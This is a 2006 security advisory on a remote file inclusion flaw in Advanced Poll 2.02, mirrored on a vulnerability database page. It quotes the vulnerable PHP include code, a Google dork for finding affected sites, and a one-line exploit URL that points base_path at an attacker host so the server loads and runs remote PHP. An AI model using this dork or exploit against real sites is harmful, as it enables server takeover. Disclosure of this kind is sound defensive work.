Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13587
HistoryJul 24, 2006 - 12:00 a.m.

SolpotCrew Advisory #2 - Advanced Poll ver 2.02 (base_path) Remote File Inclusion

2006-07-2400:00:00
vulners.com
61

#############################SolpotCrew Community################################

Advanced Poll ver 2.02 (base_path) Remote File Inclusion

Vendor site : http://www.proxy2.de/scripts.php

#################################################################################

Bug Found By :Solpot a.k.a (k. Hasibuan)

contact: [email protected]

Website : http://www.solpotcrew.org/adv/solpot-adv-02.txt

################################################################################

Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja ,

L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy

home_edition2001 , Rendy ,Tje , m3lky , no-profile

and all crew #mardongan @ irc.dal.net

###############################################################################
Input passed to the "base_path" is not properly verified
before being used to include files. This can be exploited to execute
arbitrary PHP code by including files from local or external resources.

code from /admin/common.inc.php

$pollvars['SELF'] = basename($PHP_SELF);
if (file_exists("$base_path/lang/$pollvars[lang]")) {
include ("$base_path/lang/$pollvars[lang]");
} else {
include ("$base_path/lang/english.php");

google dork : inurl:comments.php?action= send id

EXPLOIT :

http://somehost/[path_advanced_poll]/admin/common.inc.php?base_path=http://atacker

##############################MY LOVE JUST FOR U RIE#########################
######################################E.O.F##################################